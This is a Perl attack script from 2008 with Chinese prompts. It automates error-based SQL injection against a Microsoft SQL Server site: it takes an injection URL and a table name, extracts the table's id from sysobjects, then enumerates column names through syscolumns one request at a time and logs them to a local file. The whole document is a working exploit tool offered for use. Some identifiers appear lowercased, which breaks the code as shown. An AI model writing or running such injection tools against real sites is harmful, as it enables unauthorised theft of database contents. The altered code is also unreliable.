|
#!/usr/bin/perl -w
#codz by n3tl04d
#date 2008-4-13
use strict;
use lwp;
if(@argv != 2){
print "用法:$0 注入点 表名";
exit;
}
my $browser;
my $start=time();
my $talbe=$argv[1];
my $vul=$argv[0];
sub do_get {
$browser = lwp::useragent->new unless $browser;
my $resp = $browser->get(@_);
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
if wantarray;
return unless $resp->is_success;
return $resp->content;
}
my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
my ($content, $status, $is_success) = do_get($tabl);
if ($content =~ m{value \'(.+?)\'}gi)
{
print "地到表id:$1\n";
open(file,">>e:/perl/count.txt") || die ("could not open file");
print file "===============================================================\n表名:$talbe id:$1\n";
close(file);
crake($1);
} else {
print "不能爆表\n";
last;
}
sub crake {
my @arr1=();
for (my $j=1;$j<=470;$j++) {
print "猜解第$j个表列\n";
my @arr=join("','",@arr1);
my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
my ($content, $status, $is_success) = do_get($url);
if ($content =~ m{value \'(.+?)\'}gi)
{
print "地到表列:$1\n";
push(@arr1,$1);
save($1);
} else {
print "猜解完成\n";
last;
}
}
}
my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";
sub save {
open(file1,">>e:/perl/count.txt") || die ("could not open file");
print file1 "-$_[0]\n";
close(file1);
} |
|